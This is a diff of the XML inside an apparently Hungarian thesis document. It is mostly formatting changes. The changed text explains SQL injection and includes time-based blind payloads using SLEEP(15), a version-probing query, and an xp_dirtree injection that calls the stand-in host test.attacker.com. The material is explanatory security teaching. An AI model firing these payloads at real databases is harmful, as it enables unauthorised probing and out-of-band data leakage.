+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -15388,8 +20665,36 @@
           <w:szCs w:val="20"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>Alex Kaechele 2018. Classification</w:t>
-      </w:r>
+        <w:t xml:space="preserve">Alex </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Kaechele</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 2018. </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Classification</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -15737,7 +21042,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId13" cstate="print">
+                    <a:blip r:embed="rId17" cstate="print">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -15782,7 +21087,35 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">a Logistic Regression </w:t>
+        <w:t xml:space="preserve">a </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Logistic</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Regression</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -15829,7 +21162,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId14" cstate="print">
+                    <a:blip r:embed="rId18" cstate="print">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -15874,8 +21207,30 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>K-Nearest Neighbors</w:t>
-      </w:r>
+        <w:t>K-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Nearest</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Neighbors</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -15927,7 +21282,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId15" cstate="print">
+                    <a:blip r:embed="rId19" cstate="print">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -15972,7 +21327,49 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">a Linear Support Vector </w:t>
+        <w:t xml:space="preserve">a </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Linear</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Support</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Vector</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -15982,9 +21379,9 @@
       </w:r>
     </w:p>
     <w:sectPr>
-      <w:headerReference w:type="default" r:id="rId16"/>
-      <w:footerReference w:type="default" r:id="rId17"/>
-      <w:headerReference w:type="first" r:id="rId18"/>
+      <w:headerReference w:type="default" r:id="rId20"/>
+      <w:footerReference w:type="default" r:id="rId21"/>
+      <w:headerReference w:type="first" r:id="rId22"/>
       <w:pgSz w:w="11906" w:h="16838"/>
       <w:pgMar w:top="1418" w:right="1418" w:bottom="1418" w:left="1418" w:header="709" w:footer="709" w:gutter="567"/>
       <w:cols w:space="708"/>
@@ -17785,6 +23182,119 @@
     </w:lvl>
   </w:abstractNum>
   <w:abstractNum w:abstractNumId="15" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="497422CA"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="A65A3604"/>
+    <w:lvl w:ilvl="0" w:tplc="040E0001">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1287" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="040E0003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2007" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="040E0005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2727" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="040E0001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3447" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="040E0003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4167" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="040E0005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4887" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="040E0001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5607" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="040E0003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6327" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="040E0005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="7047" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="16" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="590A1BF6"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="E24CFA5A"/>
@@ -17873,7 +23383,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="16" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="17" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="61BF323C"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="EA52E50E"/>
@@ -17986,7 +23496,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="17" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="18" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="66691043"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="FD28A20C"/>
@@ -18099,7 +23609,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="18" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="19" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="66C264D6"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="CD9A3D8E"/>
@@ -18212,7 +23722,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="19" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="20" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="6B8E7620"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="D8E6ABE4"/>
@@ -18325,7 +23835,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="20" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="21" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="760D2097"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="EC5072AC"/>
@@ -18438,7 +23948,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="21" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="22" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="76805003"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="ADD2BED6"/>
@@ -18559,7 +24069,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="22" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="23" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="771832AE"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="F17E290E"/>
@@ -18672,7 +24182,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="23" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="24" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="79BB3A78"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="76AE7DE8"/>
@@ -18795,7 +24305,7 @@
     <w:abstractNumId w:val="9"/>
   </w:num>
   <w:num w:numId="4">
-    <w:abstractNumId w:val="18"/>
+    <w:abstractNumId w:val="19"/>
   </w:num>
   <w:num w:numId="5">
     <w:abstractNumId w:val="7"/>
@@ -18813,16 +24323,16 @@
     <w:abstractNumId w:val="3"/>
   </w:num>
   <w:num w:numId="10">
-    <w:abstractNumId w:val="23"/>
+    <w:abstractNumId w:val="24"/>
   </w:num>
   <w:num w:numId="11">
-    <w:abstractNumId w:val="16"/>
+    <w:abstractNumId w:val="17"/>
   </w:num>
   <w:num w:numId="12">
     <w:abstractNumId w:val="6"/>
   </w:num>
   <w:num w:numId="13">
-    <w:abstractNumId w:val="15"/>
+    <w:abstractNumId w:val="16"/>
   </w:num>
   <w:num w:numId="14">
     <w:abstractNumId w:val="10"/>
@@ -18837,7 +24347,7 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="16">
-    <w:abstractNumId w:val="21"/>
+    <w:abstractNumId w:val="22"/>
   </w:num>
   <w:num w:numId="17">
     <w:abstractNumId w:val="1"/>
@@ -18867,25 +24377,28 @@
     <w:abstractNumId w:val="4"/>
   </w:num>
   <w:num w:numId="22">
-    <w:abstractNumId w:val="19"/>
+    <w:abstractNumId w:val="20"/>
   </w:num>
   <w:num w:numId="23">
     <w:abstractNumId w:val="5"/>
   </w:num>
   <w:num w:numId="24">
-    <w:abstractNumId w:val="20"/>
+    <w:abstractNumId w:val="21"/>
   </w:num>
   <w:num w:numId="25">
-    <w:abstractNumId w:val="22"/>
+    <w:abstractNumId w:val="23"/>
   </w:num>
   <w:num w:numId="26">
     <w:abstractNumId w:val="12"/>
   </w:num>
   <w:num w:numId="27">
-    <w:abstractNumId w:val="17"/>
+    <w:abstractNumId w:val="18"/>
   </w:num>
   <w:num w:numId="28">
     <w:abstractNumId w:val="14"/>
+  </w:num>
+  <w:num w:numId="29">
+    <w:abstractNumId w:val="15"/>
   </w:num>
 </w:numbering>
 </file>
@@ -19365,7 +24878,6 @@
   <w:style w:type="character" w:default="1" w:styleId="Bekezdsalapbettpusa">
     <w:name w:val="Default Paragraph Font"/>
     <w:uiPriority w:val="1"/>
-    <w:semiHidden/>
     <w:unhideWhenUsed/>
   </w:style>
   <w:style w:type="table" w:default="1" w:styleId="Normltblzat">
@@ -20069,6 +25581,44 @@
       <w:color w:val="808080"/>
     </w:rPr>
   </w:style>
+  <w:style w:type="paragraph" w:styleId="Vgjegyzetszvege">
+    <w:name w:val="endnote text"/>
+    <w:basedOn w:val="Norml"/>
+    <w:link w:val="VgjegyzetszvegeChar"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="00392E6B"/>
+    <w:rPr>
+      <w:sz w:val="20"/>
+      <w:szCs w:val="20"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="VgjegyzetszvegeChar">
+    <w:name w:val="Végjegyzet szövege Char"/>
+    <w:basedOn w:val="Bekezdsalapbettpusa"/>
+    <w:link w:val="Vgjegyzetszvege"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:rsid w:val="00392E6B"/>
+    <w:rPr>
+      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+      <w:sz w:val="20"/>
+      <w:szCs w:val="20"/>
+      <w:lang w:val="en-US" w:eastAsia="hu-HU"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:styleId="Vgjegyzet-hivatkozs">
+    <w:name w:val="endnote reference"/>
+    <w:basedOn w:val="Bekezdsalapbettpusa"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="00392E6B"/>
+    <w:rPr>
+      <w:vertAlign w:val="superscript"/>
+    </w:rPr>
+  </w:style>
 </w:styles>
 </file>
 

--- a/szakdolgozat.docx
+++ b/szakdolgozat.docx
@@ -4575,7 +4575,21 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>, emellett adminisztrációs műveleteket hajthatnak végre az adatbázisban, a DBMS fájlban található adott fájl tartalmát helyreállíthatja a rendszerben, és egyes esetekben parancsokat adhat ki az operációs rendszernek</w:t>
+        <w:t xml:space="preserve">, emellett adminisztrációs műveleteket hajthatnak végre az adatbázisban, a DBMS fájlban található adott fájl tartalmát helyreállíthatja a rendszerben, és </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>egyes esetekben</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> parancsokat adhat ki az operációs rendszernek</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6719,101 +6733,101 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>=1-SLEEP(15)</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> [5]</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>A másodpercben megadott szám késlelteti a lekérdezés eredményét ideális esetben. Így tehát a</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> válaszidő jelzi a támadó számára, hogy a</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">z injektálás lehetséges és a szerver a </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>MySQL</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>-t használja adatbázisként.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Következő lépésként például </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>kinyerhető</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> az adatbázis verziója: </w:t>
-      </w:r>
+        <w:t>=1-</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">SELECT * FROM </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t>SLEEP(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>card</w:t>
+        <w:t>15)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> [5]</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>A másodpercben megadott szám késlelteti a lekérdezés eredményét ideális esetben. Így tehát a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> válaszidő jelzi a támadó számára, hogy a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">z injektálás lehetséges és a szerver a </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>MySQL</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>-t használja adatbázisként.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Következő lépésként például </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>kinyerhető</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> az adatbázis verziója: </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> WHERE </w:t>
+        <w:t xml:space="preserve">SELECT * FROM </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -6822,7 +6836,7 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>id</w:t>
+        <w:t>card</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -6831,7 +6845,43 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>=1-IF(MID(VERSION(),1,1)=’5’, SLEEP(15),0)</w:t>
+        <w:t xml:space="preserve"> WHERE </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>id</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>=1-IF(MID(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>VERSION(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>),1,1)=’5’, SLEEP(15),0)</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -7044,52 +7094,48 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>https://example.com/products.aspx?id=1;EXEC%20master..xp_dirtree%20'%5c%5ctest.attacker.com%5c'+--+</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:vertAlign w:val="superscript"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>[6]</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Dekódoláskor a </w:t>
-      </w:r>
+        <w:t>https://example.com/products.aspx?id=1;EXEC%20master..</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>%20</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> és a </w:t>
+        <w:t>xp_dirtree%20'%5c%5ctest.attacker.com%5c'+--+</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:vertAlign w:val="superscript"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>[6]</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Dekódoláskor a </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -7097,13 +7143,13 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>%5c</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> a szóköznek és a fordított per jelnek felelnek meg, így az URL ténylegesen így néz ki: </w:t>
+        <w:t>%20</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> és a </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -7111,27 +7157,43 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">https://example.com/products.aspx?id=1;EXEC </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t>%5c</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> a szóköznek és a fordított per jelnek felelnek meg, így az URL ténylegesen így néz ki: </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>master</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t xml:space="preserve">https://example.com/products.aspx?id=1;EXEC </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
+        <w:t>master</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
